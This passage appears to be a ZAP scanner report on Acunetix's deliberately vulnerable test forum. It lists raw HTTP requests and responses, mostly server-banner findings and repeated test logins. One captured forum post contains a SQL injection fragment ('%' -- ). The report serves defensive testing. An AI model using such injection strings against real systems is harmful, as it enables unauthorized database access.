colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 272 bytes. |
GET http://testasp.vulnweb.com/sitemap.xml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/styles.css |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/styles.css HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: text/css Last-Modified: Thu, 29 May 2008 12:11:27 GMT Accept-Ranges: bytes ETag: "cea5331f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3390 |
| Response Body - size: 3,390 bytes. |
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; margin: 0; } td { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } th { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .bodystyle { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .small { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 9px; } .medium { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .big { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 16px; } .xbig { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 24px; } .expanded { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; letter-spacing: 2px; } .justified { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; text-align: justify; } .footer { font-family: "Times New Roman", Times, serif; font-size: 10px; color: #008F00; } .menubar { padding: 3px; border-width: thin; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; margin-top: 5px; margin-bottom: 5px; margin-right: 0px; margin-left: 0px; background-color: #BFFFBF; } A.menu { padding-right: 10px; padding-left: 10px; color: #008F00; text-decoration: none; background-color: #BFFFBF; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #BFFFBF; text-decoration: none; background-color: #008F00; } .disclaimer { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px; padding-top: 0px; padding-right: 10px; padding-bottom: 0px; padding-left: 10px; color: #BFFFBF; } .FramedForm { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #BFFFBF; margin-top: 10px; margin-bottom: 10px; padding: 5px; } .tableheader { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #008F00; color: #BFFFBF; font-weight: bold; } .forumtitle { font-size: 14px; font-weight: bold; text-transform: capitalize; color: #008F00; margin-top: 5px; margin-bottom: 5px; } .forumdescription { margin-left: 15px; } .userinfo { text-align: center; font-weight: bold; display: block; position: relative; width: 100px; } .post { border-top: 1px solid #008F00; border-right: 1px none #008F00; border-bottom: 1px none #008F00; border-left: 1px none #008F00; } .posttitle { border: 1px none #80FF80; background-color: #BFFFBF; font-weight: bold; margin-bottom: 15px; padding: 2px; } INPUT { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } TEXTAREA { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } INPUT.Login { width: 250px; } INPUT.postit { width: 450px; } TEXTAREA.postit { width: 450px; height: 300px; } .path { font-weight: bold; color: #006600; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; } INPUT.search { } |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=html/about.html |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 333 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 4594 |
| Response Body - size: 4,594 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm"> offices</A> in Malta, US and the UK.<BR> </P> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 441 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 211 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Default.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 134 |
| Response Body - size: 134 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 439 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 210 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp? Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 133 |
| Response Body - size: 133 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 457 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
